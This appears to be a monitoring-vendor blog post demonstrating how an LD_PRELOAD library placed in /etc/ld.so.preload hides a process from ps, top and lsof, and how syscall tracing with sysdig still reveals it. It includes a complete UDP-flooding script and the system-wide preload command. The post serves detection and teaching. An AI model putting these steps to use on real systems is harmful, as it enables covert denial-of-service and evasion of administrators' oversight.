Introduction
The other day I was looking at the output of top
on my machine, and I wondered: how hard would it be to hide specific processes and/or network connections from traditional monitoring tools like ps
, top
, lsof
, …? I decided to kill a couple hours and try to hack together a solution. In this post, I’ll show you some of the answers I came up with, and some proof of concept code to implement this. I’ll also show that sysdig is not susceptible to my hack, and explain why.
The goal that I want to achieve is to deliberately hide a simple and malicious Python script (I’ll call it evil_script.py
) that does some damage to my system, saturating CPU and network by sending UDP packets towards a poor victim:
#!/usr/bin/python
import socket
import sys
def send_traffic(ip, port):
print "Sending burst to " + ip + ":" + str(port)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((ip, port))
while True:
sock.send("I AM A BAD BOY")
if len(sys.argv) != 3:
print "Usage: " + sys.argv[0] + " IP PORT"
sys.exit()
send_traffic(sys.argv[1], int(sys.argv[2])) Let’s go!
The Baseline Behavior
I’ll start by running this:
gianluca@sid:~$ ./evil_script.py 1.2.3.4 666
Sending burst to 1.2.3.4:666
If you run it, you’ll see it will quickly saturate your system resources. Perfect use case for starting the analysis. Let’s confirm that the process is there and eating my CPU, using ps
:
gianluca@sid:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca 8585 105 0.0 34256 6152 pts/6 R+ 12:03 0:07 /usr/bin/python ./evil_script.py 1.2.3.4 666
...
Yep. I can also look at the network connections opened by the process by using lsof
:
gianluca@sid:~$ sudo lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
evil_scri 8290 gianluca 3u IPv4 23936 0t0 UDP 172.16.189.136:33220->1.2.3.4:666
...
So the process is there, doing network activity. If I want to hide this information, the first thing I have to do is understand how ps
and similar tools can actually extract the information about my process.
How ps works
Tools like ps
leverage the /proc
file system, a Linux construct that we explained at a high level in a previous post. Let’s dig into the details now using sysdig
:
gianluca@sid:~$ sudo sysdig proc.name = ps
...
447463 23:54:12.077878685 2 ps (3214) > openat dirfd=AT_FDCWD name=/proc flags=1089(O_DIRECTORY|O_NONBLOCK|O_RDONLY) mode=0
447465 23:54:12.077880122 2 ps (3214) < openat fd=5(/proc)
447473 23:54:12.077887674 2 ps (3214) > getdents
447486 23:54:12.077988237 2 ps (3214) < getdents ... 452546 23:54:12.082257864 2 ps (3214) > open
452547 23:54:12.082259424 2 ps (3214) < open fd=6(/proc/3174/stat) name=/proc/3174/stat flags=1(O_RDONLY) mode=0
452548 23:54:12.082259730 2 ps (3214) > read fd=6(/proc/3174/stat) size=1024
452549 23:54:12.082262601 2 ps (3214) < read res=322 data=3174 (evil_script.py) R 3089 3174 3089 34816 3174 4202496 1620 0 15 0 8 3474 0 0 452550 23:54:12.082262874 2 ps (3214) > close fd=6(/proc/3174/stat)
452551 23:54:12.082262982 2 ps (3214) < close res=0 452552 23:54:12.082266445 2 ps (3214) > open
452553 23:54:12.082267682 2 ps (3214) < open fd=6(/proc/3174/status) name=/proc/3174/status flags=1(O_RDONLY) mode=0
452554 23:54:12.082268000 2 ps (3214) > read fd=6(/proc/3174/status) size=1024
452555 23:54:12.082274407 2 ps (3214) < read res=854 data=Name:.evil_script.py.State:.R (running).Tgid:.3174.Ngid:.0.Pid:.3174.PPid:.3089. 452556 23:54:12.082274624 2 ps (3214) > close fd=6(/proc/3174/status)
452557 23:54:12.082274724 2 ps (3214) < close res=0 452558 23:54:12.082276935 2 ps (3214) > open
452559 23:54:12.082278171 2 ps (3214) < open fd=6(/proc/3174/cmdline) name=/proc/3174/cmdline flags=1(O_RDONLY) mode=0
452560 23:54:12.082278466 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131072
452561 23:54:12.082280215 2 ps (3214) < read res=46 data=/usr/bin/python../evil_script.py.1.2.3.4.6666. 452562 23:54:12.082280463 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131026
452563 23:54:12.082280814 2 ps (3214) < read res=0 data= 452564 23:54:12.082281083 2 ps (3214) > close fd=6(/proc/3174/cmdline)
452565 23:54:12.082281216 2 ps (3214) < close res=0
This perfectly highlights how ps
works: first, the directory /proc
is opened via the openat()
system call. Then, the process calls getdents()
on the opened directory, which is a system call that returns the list of files/directories contained in a specific directory (/proc
in this case). If you’ve ever run ls /proc
, you noticed that there is a subdirectory for every running process in the system, and each directory is named after the PID of the process itself. So, ps
will just grab the list from getdents()
, and then iterate over a fixed set of files in each subdirectory. These files, as you can see from the event list, are named /proc/PID/status
, /proc/PID/stat
, and /proc/PID/cmdline
, and contain all the information that ps shows in the output.
It’s worth noticing (as it will be useful in the next section), that the process itself doesn’t directly call openat()
and getdents()
, as those are system calls that are abstracted by the C standard library (libc
). If you ever cared to read the libc
documentation, libc
provides two different functions, opendir()
and readdir()
, and they take care of calling the system calls themselves, providing a somewhat simpler API to the developer. So these last ones are the functions that are directly called from ps
.
Hiding the process
After this quick digression on how ps
works, it seems fairly obvious that if we want to hide our process, we need a way to prevent these tools from accessing the proper files under /proc/PID/
. What are the options? There are various methods worth mentioning:
- Using a proper framework: there are a bunch of very good frameworks, like SELinux and Grsecurity that do, among other things, exactly this. In a production system, I would absolutely consider these, although today I want to get my hands dirty and have fun creating something from scratch.
- Modify top/ps/… binaries: I could grab the source code of each of these tools, implement my own “hiding linux processes” logic, recompile, and replace the binaries. Very inefficient and time consuming.
- Modify
libc
: I could modify thereaddir()
function insidelibc
and input the code to exclude the access to some/proc
files. But recompilinglibc
is a burden, not to mention thelibc
code tends to be very hard to understand.
- Modify the system calls in the kernel: This is the most advanced, and it would work by intercepting and modifying the
getdents()
system call directly in the kernel with a custom module. It’s definitely tempting, but I won’t follow this route today because I’m already very familiar with how the system call interception works in sysdig, so I want to do something new.
I decided to go for an intermediate solution, one that is interesting and simple enough to implement in an hour or so: it’s a variant of “modifying libc
” based on a tricky feature offered by the Linux dynamic linker (the component that takes care of loading the various libraries needed by a program at runtime), called preloading.
With preloading, Linux is kind enough to give us the option to load a custom shared library before the other normal system libraries are loaded. This means that, if the custom library exports a function with the same signature of one found in a system library, we are literally able to override it with the custom code in our library, and all the processes will automatically pick our custom one!
This sounds like a solution to my problem, because I could write a very simple custom library that overrides libc
’s readdir()
, and write the logic to hide the process! The logic would be fairly straightforward too: every time I see that the /proc/PID
directory (where PID is the PID of the process having the name “evil_script”) is being read, I just block that access in a clean way, thus hiding the entire directory! I went ahead and implemented these thoughts in code. You can get the sources at https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c (it’s actually less than 100 lines of code including comments, so go read it!). Once the code is written, let’s compile it as a shared library, and install it in the system path:
gianluca@sid:~/libprocesshider$ make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/
Now, I just need to tell the dynamic linker to actually use it. I want to install it system-wide, so that every new process in the system can pick this up automatically. This is done by simply writing my library path into a configuration file:
root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Done! From this moment on, every new binary that I’ll launch will execute my custom code when iterating through directories via readdir()
. So let’s go back and try this executing ps
and lsof
while the evil script is running:
gianluca@sid:~$ sudo ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
...
gianluca@sid:~$ sudo lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
...
It works! My process is now running in invisible mode, even when the tools are run as root. I also repeated this with pstree
, top
and htop
, and none of them were able to show my process anymore.
This is just a simple example, but we could also spoof more information, for example:
- Modify the global CPU usage counters:
/proc/stat
contains those statistics, so I could intercept all the read operations to that file and return a custom one, faking a 0% global CPU usage.
- Modify the connection list: for example, netstat uses the
/proc/net/tcp
file to get the list of TCP connections. Just intercept the reads to the file and hide a specific connection.
Good exercises for the reader :)
Note that this method won’t work if the binaries are statically linked against libc
. I’ve seen some niche distributions extremely focused on security, where all the binaries dependencies are statically linked. This has the huge disadvantage that the binaries tend to get pretty big, and shipping an update for a library forces shipping new binaries of every program that depends on it, so usually it’s not done for mainstream distributions.
4 different ways of hiding a #Linux process
Click to tweet
Sysdig
Let’s see if sysdig can be tricked as well, starting by CPU usage:
gianluca@sid:~$ sudo sysdig -c topprocs_cpu
CPU% Process
------------------------------
99.99% evil_script.py
2.46% sysdig
0.27% java
0.03% sshd
And network activity:
gianluca@sid:~$ sudo sysdig -c topprocs_net
Bytes Process
------------------------------
862.53KB evil_script.py
400B sshd
gianluca@sid:~$ sudo sysdig -c topconns
Bytes Proto Connection
------------------------------
841.79KB udp 172.16.189.136:54241->1.2.3.4:8888
496B tcp 172.16.189.1:57832->172.16.189.136:22
With sysdig, we’re still able to see it all! This is because sysdig doesn’t necessarily rely on /proc
to look for system activity (although it uses it if available). Sysdig inspects every system call, and in this data the malicious process is still clearly visible, along with all its used resources. Hiding system calls is a much more challenging task that can’t be done in a couple hours. In fact, sysdig can see everything:
gianluca@sid:~$ sudo sysdig proc.name contains evil_script
261683 19:27:57.433924531 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261684 19:27:57.433930125 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261685 19:27:57.433931321 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261686 19:27:57.433970361 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261687 19:27:57.433975269 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261688 19:27:57.433980600 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261689 19:27:57.433981682 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
261690 19:27:57.434022148 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261691 19:27:57.434026297 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->1.2.3.4:8888) size=14 tuple=NULL
...
As a bonus, sysdig is also showing me that the dynamic linker is loading my custom library before libc
. This is what happens when ps
executes after the preload change:
gianluca@sid:~$ sudo sysdig proc.name = ps
2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0
...
2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0
2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832
...
2810 00:21:52.721293540 1 ps (3351) > open
2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0
2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832
...
/usr/local/lib/libprocesshider.so
is automatically loaded (with open()
and read()
) before /lib/x86_64-linux-gnu/libc.so.6
, without having to change the ps
code or the libc
code.
In theory, I could have used strace/ltrace
to attach to the process and see what it was doing in a similar way, but if you remember I completely hid the malicious process PID from /proc
, so how would we find it? Those tools require the exact PID to attach in order to work. I could have brute-forced the entire PID range, but that doesn’t seem like a very attractive alternative. Also, those tools just provide a flat list of events, whereas sysdig, with chisels, can aggregate the events and show me exactly what I care about (in this case CPU/network consumption).
Final notes
As one last consideration, it’s worth clarifying that although it might be possible to get your machine compromised in this exact way (I know there are rootkits out there who rely on this easy and effective method), that is certainly not the point of this post. I just enjoyed it as a thought experiment, and hopefully this demonstrates a simple and powerful method that can be used by application developers to solve real problems in certain circumstances. I think this also proves that monitoring the system usage can be done from different perspectives, and getting data from system calls can be as good as extracting it from the /proc
file system. And at the end of the day, I think we’re all very lucky to have Linux and the /proc
file system with its useful metrics exported in plain-text files, ready to be read and inspected without any custom tools!
As always, we’d love to hear from you. If you have any thoughts or questions, please let us know in the comments or on @sysdig. Thanks!